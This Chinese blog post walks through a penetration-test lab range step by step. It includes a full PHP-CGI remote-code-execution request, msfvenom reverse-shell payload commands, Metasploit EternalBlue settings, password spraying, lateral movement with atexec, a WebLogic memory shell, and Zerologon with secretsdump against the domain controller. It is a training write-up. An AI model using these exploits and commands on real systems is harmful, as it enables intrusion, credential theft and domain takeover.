PHPRCE-永恒之蓝-防火墙上线-密码喷射-DC域控提权-weblogic

PHPRCE-永恒之蓝-防火墙上线-密码喷射-DC域控提权-weblogic

网络安全者 2025-05-16 01:25

引言

近期利用闲暇时间,我对小迪老师提供的靶场环境进行了全面的渗透测试实战演练。本次记录旨在详细还原整个渗透过程,包括环境搭建、信息收集、漏洞利用、权限提升及内网横向移动等关键环节,以期巩固所学知识并提升实战技能。

1747053610_6821ec2ab177eca5ea6c6.png!small?1747053611173

环境搭建

项目下载:

链接: https://pan.baidu.com/s/1JrCRqsF_mVTB6gh6VkdTng提取码: ga54

1747053657_6821ec59ef27f0038bab5.png!small?1747053657652

配置网卡:

1747053672_6821ec685305373a44731.png!small?1747053672020

vmware8/NAT 对应192.168.139.0网段

vmware2对应192.168.2.0网段

vmware3对应192.168.3.0网段

vmware10对应192.168.10.0网段

Windows Server 2012

1747053689_6821ec79cab39a92ffba4.png!small?1747053689961

登陆进去打开xampp服务

1747053703_6821ec8751fc13d345b1b.png!small?1747053703115

Windows 7

1747053718_6821ec96d228b8dbc5c46.png!small?1747053718851

Windows 10

1747053732_6821eca411a374c9ddc6d.png!small?1747053732201

Windows Server 2012 R2(weblogic 单机)

1747053756_6821ecbcb0f8e2d9422fa.png!small?1747053756760

Windows Server 2012-WEB

1747053772_6821eccc9d541e944ea61.png!small?1747053772632

Windows Server 2016-AD-2016

1747053790_6821ecde222d78479e1f4.png!small?1747053789967

打靶

windows server 2012

信息收集

1747053809_6821ecf16c257bbc3c9a9.png!small?1747053809254

XAMPP 渗透拿shell

打开网站80端口

1747053833_6821ed09c2d9b2f19ad6f.png!small?1747053833764
1747053843_6821ed133ade163743e16.png!small?1747053843715

https://mp.weixin.qq.com/s/93TuxZ4AVqHXcnJw3M4hRg

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.139.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
<?php die("Te"."sT");?>

发现可以成功执行命令,但是想要反弹shell没有办法只用get,所以我们得尝试写入文件

查看phpinfo,发现当我们写入文件应该会放在\php\下

1747053873_6821ed3119dc55c849896.png!small?1747053873212

而经过chatgpt的搜索,可以知道网站的路径在/htdocs/下,所有我们得把文件上传到这

1747053884_6821ed3c81fd4414c20de.png!small?1747053885236

“); ?>成功写入,然后将其改为后门的木马

1747053896_6821ed48a2b40830cb628.png!small?1747053897214

成功写入连接

1747053908_6821ed5475819d3b554a7.png!small?1747053910627

将其连接到cs(生成后门上传执行)

1747053920_6821ed60ad830a714eaef.png!small?1747053921083

windows7

信息收集

1747053943_6821ed778c7fe2a547427.png!small?1747053943415

端口扫描和探测

并且抓取明文的密码

1747053952_6821ed8096000dd4e1e26.png!small?1747053952322

1747053958_6821ed86c2afee9bdbd74.png!small?1747053958452

发现129只有445端口

将fscan传上去

运行,发现1747053972_6821ed9429b329afd7dbb.png!small?1747053971846

存在永恒之蓝

永恒之蓝漏洞

先将其转到msf上1747054069_6821edf52eb331a923220.png!small

1747054083_6821ee03bf1fd7ff66914.png!small?1747054083848

1747054090_6821ee0ad16e759c7f671.png!small?1747054090544

或者直接用哥斯拉的传

1747054106_6821ee1a793498a9be2a3.png!small?1747054106238

或者直接生成msf的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=5210 -f exe -o 5210.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.129
set lport 1234
run

建立路由

run autoroute -p //查看当前路由表

run post/multi/manage/autoroute //添加当前路由表

注意:因为这是内网网段的机器,所以我们只是单纯的区执行这个永恒之蓝漏洞是完全不行的,我们得先设置监听器,到 第一台的主机

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.2.134

set lport 4548

1747054179_6821ee631fa060103552d.png!small?1747054180633

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost 192.168.2.129

set rhosts 192.168.2.129

set lhost 192.138.2.134

set lport 4548

上传后门,然后再转发上线

成功上线

Windows10

密码喷射

再administrator

1747054216_6821ee88540791d035f0b.png!small?1747054217329

1747054223_6821ee8fe3406b58f2904.png!small?1747054223767

密码横向移动1747054235_6821ee9bd245202dd5bbb.png!small?1747054236714

windows server R2

1747054249_6821eea9b1e0a94cdaf6a.png!small?1747054249763

发现7001端口,是weblogic,所以建立代理,访问

1747054264_6821eeb8b090cdfe4ca72.png!small?1747054264745
1747054274_6821eec2725be3b93b064.png!small?1747054274494

windows server 2012

1747054295_6821eed7a942669cfcb09.png!small?1747054295603

集成攻击一把梭

1747054305_6821eee193964e667826e.png!small?1747054305585

植入内存马

1747054321_6821eef1a6a8a8f46fc23.png!small?1747054321366

上线cs

windows server 2012 web

抓取密码,发现密码

1747054336_6821ef00a3d8d831ca2a6.png!small?1747054336314
1747054396_6821ef3c9312503b78ade.png!small?1747054396322

尝试用密码横向移动,但是自身有防火墙,所以没办法使用反向上线,需要通过正向上线1747054405_6821ef456d9d02f3316a4.png!small?1747054405208
1747054412_6821ef4c597b5b98b6f1c.png!small?1747054412075

不知道为什么我的这样子无法上线

先用ipc协议将文件共享1747054423_6821ef57f3cdf9af26286.png!small?1747054423771

然后使用atexec来执行

1747054442_6821ef6aab0a502f416ea.png!small?1747054442592

成功上线

DC

net time /domain发现是在域内1747054460_6821ef7ceadbe9e24d7b2.png!small?1747054460789

先建立代理

改host文件为dc

1747054472_6821ef8885abb961f0892.png!small?1747054472641

cve 2020 1472 域控提权

1747054485_6821ef952c9696e296624.png!small?1747054484904

清空密码

(在impacket里面)

python secretsdump.py “xiaodi.org/[email protected]” -no-pass

1747054497_6821efa176812cfb0796b.png!small?1747054497635

一般都是第一个administrator的第一个或者第二个1747054512_6821efb0a161527e060e8.png!small?1747054512627

(域控是dc.xiaodi.org ,)

成功得到shell,然后将其上线cs1747054524_6821efbc067d5bf4a25a5.png!small?1747054523784

成功上线1747054532_6821efc4c687158b44847.png!small?1747054532602

至此完成所有的机子的上线

总结

本次小迪老师靶场实战演练,从环境搭建到对域控制器的完全控制,覆盖了Web渗透、内网横向移动、权限提升等多个核心环节。在实践过程中,不仅巩固了PHP-CGI、永恒之蓝、WebLogic等常见漏洞的利用方法,也深入理解了内网渗透中路由建立、代理配置、文件传输及正向上线等关键技巧。同时,对在实战中遇到的问题(如永恒之蓝利用失败、正向上线受阻)进行了分析,并尝试了不同的解决思路。

通过此次靶场实战,进一步提升了个人在网络安全领域的综合实战能力和问题解决能力。

关 注 有 礼

欢迎关注公众号:网络安全者

本文内容来自网络,如有侵权请联系删除